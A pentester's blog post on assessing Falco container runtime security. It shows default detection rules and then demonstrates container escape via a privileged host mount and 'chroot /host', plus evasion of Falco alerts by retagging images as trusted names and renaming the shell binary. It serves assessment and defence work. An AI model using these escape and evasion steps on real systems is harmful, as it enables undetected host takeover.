antiTree | posts and projects
posted on Sep 15, 2019

Sometimes during a container or Kubernetes assessment, we’re asked to review whether a runtime security tool that a client uses is sufficient for their threat model. This often means reviewing a custom seccomp-bpf profile, AppArmor config, or third-party tool that tries to enforce the isolation between a container and the host. There are two approaches we usually take during these gigs:

  1. Audit the profile and identify any flaws or bypasses that could exist.
  2. Analyze the container at runtime to validate the policy actually enforces the expected ruleset.

Basics of Container Hardening

There are ways to harden your runtime, like dropping capabilities when a container starts. But when your goal is to reinforce the isolation between the container and the host, so that the container behaves more like a sandbox, the main option you have is syscall filtering/monitoring: monitoring and blocking which syscalls are allowed to go from the container to the host.

If you look at some of the takes on container runtimes like Nabla, they’re taking a different approach to hardening but effectively doing the same thing – blocking syscalls from a container that could affect the host.
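To make the syscall-filtering idea concrete, here is a minimal Python sketch of how a Docker-style seccomp profile decides what happens to a syscall. It only matches on the syscall name and treats the first matching entry as the winner, which is a simplification: argument filters, capabilities, and architectures are ignored. The profile contents and the `action_for` helper are made up for this example.

```python
# Hypothetical, heavily trimmed profile in the Docker seccomp JSON layout.
PROFILE = {
    "defaultAction": "SCMP_ACT_ERRNO",
    "syscalls": [
        {"names": ["read", "write", "exit_group"], "action": "SCMP_ACT_ALLOW"},
        {"names": ["chroot"], "action": "SCMP_ACT_KILL"},
    ],
}


def action_for(profile, syscall_name):
    """Return the action of the first entry naming the syscall, else the default."""
    for entry in profile["syscalls"]:
        if syscall_name in entry["names"]:
            return entry["action"]
    return profile["defaultAction"]


if __name__ == "__main__":
    for name in ("read", "chroot", "mount"):
        print(name, "->", action_for(PROFILE, name))
```

The point of the sketch is that the decision is made per syscall, with no knowledge of which image is running or how the container was started.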

Falco Enters The Ring

Falco recently became an open source project and is now officially supported by the CNCF which is great. I’ve tried not to gush too hard over Sysdig in the past but I’ve liked their tools.

Falco is a runtime security tool designed to leverage Sysdig’s event monitoring library to add a layer of security on top of your containers and your host/Nodes. It uses a combination of syscall and network filtering that matches against a rule list that you can define. Compared to seccomp-bpf or AppArmor, this can let you create a more expressive policy about what you want to allow or block in your container environment.

Falco Examples

Here are some examples of commands and the log entries they generate:

/ # sudo cat /etc/shadow

Warning Sensitive file opened for reading by non-trusted program (user=root program=cat 
  command=cat /etc/shadow file=/etc/shadow parent=sudo gparent=zsh ggparent=<NA> 
  gggparent=<NA> container_id=host image=<NA>)

Start a privileged container, mount the host volume, and attach to it

/ # docker run -it --privileged -v /:/host busybox:latest

Notice A shell was spawned in a container with an attached terminal 
  (user=root incomplete (id=b08eb99c4c6b) shell=sh parent=<NA> cmdline=sh 
  terminal=34816 container_id=b08eb99c4c6b image=incomplete)
Notice Privileged container started (user=<NA> command=container:b08eb99c4c6b 
  eager_ride (id=b08eb99c4c6b) image=busybox:latest)
docker run -it --privileged -v /:/host busybox:latest
Notice Container with sensitive mount started (user=root command=container:ea83b093eb14
nifty_darwin (id=ea83b093eb14) image=busybox:latest mounts=/:/host::true:rslave)

Side Note About Filtering Containers

The last command above is fun because you’re mounting the host volume inside the container and it’s privileged so there’s not much separation from the container to the host. Once you have a shell, running the following will effectively let you take over the host:

/ # chroot /host

# cat /etc/shadow

I use this as an example because Falco’s default rules do not alert on you using chroot and it might be worth thinking about why. It’s already alerted you that a priv’d container has started and that there’s a sensitive host mount, so why keep bugging the user every time? If you compare this to writing a seccomp-bpf profile for Docker with the same effect, it would be a pretty complex policy that detects a container running as privileged, determines that it’s a sensitive volume mount, and decides how to handle it.

In practice, the seccomp-bpf way of preventing this attack skips all of that context and boils down to blocking the syscall, something like this entry in a profile’s syscalls list:

    {
        "names": [
            "chroot"
        ],
        "action": "SCMP_ACT_KILL",
        "args": [],
        "comment": ""
    }

And the default Docker seccomp profile does this (in a slightly different way than my example) so why doesn’t Falco?

The short answer, I think, is “Go for it”. Falco needs to be customized for your environment no matter what, so go ahead and start dropping syscalls with a rule like:

- rule: drop_chroot_attempts
  desc: Custom rule to prevent the chroot syscall from being used
  condition: syscall.type = chroot and not proc.name in (docker, sysdig, dragent)
  output: "Yo, somebody's been chrooting. (user=%user.name command=%proc.cmdline container=%container.id)"
  priority: WARNING
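As a rough illustration of what that condition does, here is a small Python sketch that applies the same logic to a few events. This is not how Falco evaluates rules internally. The event dictionaries and their values are invented for the example, and `rule_matches` and `render_alert` are hypothetical helper names.

```python
# Process names the rule exempts (copied from the condition above).
EXEMPT_PROCS = {"docker", "sysdig", "dragent"}


def rule_matches(event):
    """Mirror: syscall.type = chroot and not proc.name in (docker, sysdig, dragent)."""
    return event["syscall.type"] == "chroot" and event["proc.name"] not in EXEMPT_PROCS


def render_alert(event):
    """Fill in the rule's output template from the event fields."""
    return (
        "Warning Yo, somebody's been chrooting. "
        f"(user={event['user.name']} command={event['proc.cmdline']} "
        f"container={event['container.id']})"
    )


if __name__ == "__main__":
    # Hypothetical events; the field values are illustrative only.
    events = [
        {"syscall.type": "chroot", "proc.name": "chroot", "user.name": "root",
         "proc.cmdline": "chroot /host", "container.id": "1003f9513b76"},
        {"syscall.type": "chroot", "proc.name": "docker", "user.name": "root",
         "proc.cmdline": "docker run busybox", "container.id": "host"},
        {"syscall.type": "open", "proc.name": "cat", "user.name": "root",
         "proc.cmdline": "cat /etc/shadow", "container.id": "host"},
    ]
    for event in events:
        if rule_matches(event):
            print(render_alert(event))
```

Note that the exemption is keyed on the process name alone, so anything that calls itself docker, sysdig, or dragent is skipped by this check.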

Now if we run the same commands as before, we get more context:

/ # docker run -it --privileged -v /:/host busybox:latest

Notice A shell was spawned in a container with an attached terminal (user=root incomplete
  (id=b08eb99c4c6b) shell=sh parent=<NA> cmdline=sh terminal=34816 container_id=b08eb99c4c6b
   image=incomplete)
Notice Privileged container started (user=<NA> command=container:b08eb99c4c6b eager_ride 
  (id=b08eb99c4c6b) image=busybox:latest)

/ # docker run -it --privileged -v /:/host busybox:latest
Notice Container with sensitive mount started (user=root command=container:ea83b093eb14 
  nifty_darwin (id=ea83b093eb14) image=busybox:latest mounts=/:/host::true:rslave)

/ # chroot /host
Warning Yo, somebody's been chrooting. (user=root command=chroot /host container=1003f9513b76)
Warning Yo, somebody's been chrooting. (user=root command=chroot /host container=1003f9513b76)

(someone else can explain to me why there are 2 separate syscalls, but that’s beside the point)

Using Falco As Intended

My point isn’t that the default policy not blocking the chroot syscall is a security flaw, it’s that Falco right now has a different use case than other runtime security products or tools. Falco is a runtime security product AND a monitoring tool. If you filter on a syscall in Falco, you’re prone to get a lot more alerts with very little context. Compare it to seccomp – for seccomp-bpf, you’re blocking syscalls and maybe trying to stop container runtime 0-days. For Falco, you’re watching for common activities and reacting to them.

One of the challenges you get when you’re writing rules at a higher level than just blocking syscalls is that there are going to be more bypasses and edge cases you have to be concerned about. When coming up with a mitigation for an attack, like wanting to prevent a chroot from compromising the host, the question becomes “Should I block the chroot syscall or should I block the scenario where a chroot could cause damage?” I think for Falco, the expected practice is to block the attributes of the activity (privileged mode, host mounts, TTY started) and not just the syscalls, so that your team can make more educated decisions about the context of the issue.

I’ll go through a few examples that can bypass Falco’s default rules:

Bypass Privileged Restrictions

Falco can detect when a privileged container is started, as one might expect. It does this with a rule. As you can see below, the rule for detecting priv’d containers has a condition that references a macro, which in turn references a list. This could be interpreted as “If something starts a privileged container that’s not one of the ones from my list of approved images, alert.”

- list: falco_privileged_images
  items: [
    docker.io/sysdig/agent, docker.io/sysdig/falco, docker.io/sysdig/sysdig,
    gcr.io/google_containers/kube-proxy, docker.io/calico/node,
    docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/mesosphere/mesos-slave,
    docker.io/docker/ucp-agent, sematext_images, k8s.gcr.io/kube-proxy
    ]

- macro: falco_privileged_containers
  condition: (openshift_image or
              user_trusted_containers or
              container.image.repository in (trusted_images) or
              container.image.repository in (falco_privileged_images) or
              container.image.repository startswith istio/proxy_ or
              container.image.repository startswith quay.io/sysdig)

- rule: Launch Privileged Container
  desc: Detect the initial process started in a privileged container. Exceptions are made for known trusted images.
  condition: >
    container_started and container
    and container.privileged=true
    and not falco_privileged_containers
    and not user_privileged_containers    
  output: Privileged container started (user=%user.name command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
  priority: INFO
  tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]

Since we can’t run our busybox image as privileged anymore (or at least not without someone finding us), let’s figure out a way around it by tagging it to match the “falco_privileged_containers” macro, which allows the string “k8s.gcr.io/kube-proxy” as an image name.
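The allowlist part of that rule can be sketched in a few lines of Python. This is a simplified model under my own assumptions: it only covers the list-membership clause, it uses a subset of the list, and `alerts_on_privileged_start` and the container dictionaries are hypothetical.

```python
# Subset of the falco_privileged_images list shown above.
FALCO_PRIVILEGED_IMAGES = {
    "docker.io/sysdig/falco",
    "gcr.io/google_containers/kube-proxy",
    "k8s.gcr.io/kube-proxy",
}


def alerts_on_privileged_start(container):
    """Simplified 'Launch Privileged Container' check: list membership only."""
    trusted = container["image.repository"] in FALCO_PRIVILEGED_IMAGES
    return container["privileged"] and not trusted


if __name__ == "__main__":
    honest = {"image.repository": "busybox", "privileged": True}
    retagged = {"image.repository": "k8s.gcr.io/kube-proxy", "privileged": True}
    print("busybox alerts:", alerts_on_privileged_start(honest))
    print("retagged busybox alerts:", alerts_on_privileged_start(retagged))
```

The check only ever sees the repository string. Nothing in it ties that string to the actual contents of the image, which is what the retagging trick relies on.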

Demo

Tag busybox as “k8s.gcr.io/kube-proxy”

docker tag busybox:latest k8s.gcr.io/kube-proxy

Start the container again

docker run -it --privileged -v /:/host k8s.gcr.io/kube-proxy 

Success! This will not produce any alerts about you running a privileged container.

It will however create an alert that says

Notice Container with sensitive mount started (user=root command=container:ea83b093eb14 nifty_darwin (id=ea83b093eb14) image=busybox:latest mounts=/:/host::true:rslave)

Bypass Sensitive Volume Mount Alert

Let’s see if we can’t bypass the sensitive mounts alert then. Here are the rules:

- list: falco_sensitive_mount_images
  items: [
    docker.io/sysdig/agent, docker.io/sysdig/falco, docker.io/sysdig/sysdig,
    gcr.io/google_containers/hyperkube,
    gcr.io/google_containers/kube-proxy, docker.io/calico/node,
    docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
    docker.io/datadog/docker-dd-agent, docker.io/datadog/agent, docker.io/docker/ucp-agent, docker.io/gliderlabs/logspout,
    docker.io/netdata/netdata, docker.io/google/cadvisor, docker.io/prom/node-exporter
    ]

- macro: falco_sensitive_mount_containers
  condition: (user_trusted_containers or
              container.image.repository in (trusted_images) or
              container.image.repository in (falco_sensitive_mount_images) or
              container.image.repository startswith quay.io/sysdig)

Demo

Tag busybox as “quay.io/sysdig”

docker tag busybox:latest quay.io/sysdig

Start the container again

docker run -it --privileged -v /:/host quay.io/sysdig

Success! With the bonus that the string “quay.io/sysdig” allows us to run as both privileged and with a sensitive volume.
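Here is a small Python sketch of why one name satisfies both macros. It models only the `startswith` clauses from the two macros quoted earlier and treats them as plain string-prefix checks. The function names and the lookalike repository name are made up for illustration.

```python
# Prefixes taken from the startswith clauses of the two macros.
PRIVILEGED_PREFIXES = ("istio/proxy_", "quay.io/sysdig")
SENSITIVE_MOUNT_PREFIXES = ("quay.io/sysdig",)


def trusted_for_privileged(repository):
    """True if a privileged-container startswith clause would match."""
    return repository.startswith(PRIVILEGED_PREFIXES)


def trusted_for_sensitive_mount(repository):
    """True if a sensitive-mount startswith clause would match."""
    return repository.startswith(SENSITIVE_MOUNT_PREFIXES)


if __name__ == "__main__":
    # The last name is a hypothetical lookalike, not a real repository.
    for repo in ("busybox", "quay.io/sysdig", "quay.io/sysdig-lookalike/busybox"):
        print(repo, trusted_for_privileged(repo), trusted_for_sensitive_mount(repo))
```

Because a prefix match has no notion of a path boundary, any repository name that merely begins with the trusted string passes in this model.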

Bypass Terminal

Now we’re getting into it.

- list: shell_binaries
  items: [ash, bash, csh, ksh, sh, tcsh, zsh, dash]

- macro: shell_procs
  condition: proc.name in (shell_binaries)

- rule: Terminal shell in container
  desc: A shell was used as the entrypoint/exec point into a container with an attached terminal.
  condition: >
    spawned_process and container
    and shell_procs and proc.tty != 0
    and container_entrypoint    
  output: >
    A shell was spawned in a container with an attached terminal (user=%user.name %container.info
    shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository)    
  priority: NOTICE
  tags: [container, shell, mitre_execution]

If you walk up from the bottom you see that it’s basically saying “If it’s a spawned process in a container, and it’s one of the shells from my list, and it creates a TTY and it’s coming from runc/docker-runc then alert.”

Can we just rename our shell from “bash” to “antish” and bypass it?
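On paper the answer looks like yes. The following Python sketch is a simplified model of the rule’s condition, assuming the process name is just the name of the executable. The dictionary keys and the `make_proc` helper are hypothetical stand-ins for Falco’s fields and macros.

```python
# Shell names from the shell_binaries list above.
SHELL_BINARIES = {"ash", "bash", "csh", "ksh", "sh", "tcsh", "zsh", "dash"}


def terminal_shell_alert(proc):
    """Simplified 'Terminal shell in container' condition."""
    return (
        proc["in_container"]
        and proc["is_entrypoint"]
        and proc["tty"] != 0
        and proc["name"] in SHELL_BINARIES
    )


def make_proc(name):
    """Hypothetical container entrypoint process with an attached terminal."""
    return {"name": name, "in_container": True, "is_entrypoint": True, "tty": 34816}


if __name__ == "__main__":
    for name in ("bash", "antish"):
        print(name, "alerts:", terminal_shell_alert(make_proc(name)))
```

Everything else about the two processes is identical. Only the name differs, and the name is the one thing we control when we build the image.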

Demo

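FROM ubuntu
RUN cp /bin/bash /bin/antish
# Start the renamed shell by default; the ubuntu image's stock CMD would still launch bash
CMD ["/bin/antish"]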

Build your Dockerfile and name stomp it again

docker build -t quay.io/sysdig .

Start the container again

docker run -it --privileged -v /:/host quay.io/sysdig

Yes! We’ve now bypassed the terminal alert, the sensitive volume alert, and the privileged container alert. If these rules were changed from just warning the user about the activity to actually blocking them, it’d be more interesting but I think the point is made.

Conclusions

To be clear, I’m NOT finding flaws in or beating up on Falco. I’m demonstrating how Falco works, some of its intended uses, and, for my pentesting friends, what normally goes into an assessment in an environment where Falco is enabled. In the real world, the environments are much more complex and so are the bypasses. We would normally assess these rules the same way if it were an Aqua, Twistlock, or NeuVector product: what do the rules do, and how can we evade them?

Some of these methods are going into a talk I’m hoping to get accepted that shares examples and testing methodology for NCC Group’s container practice.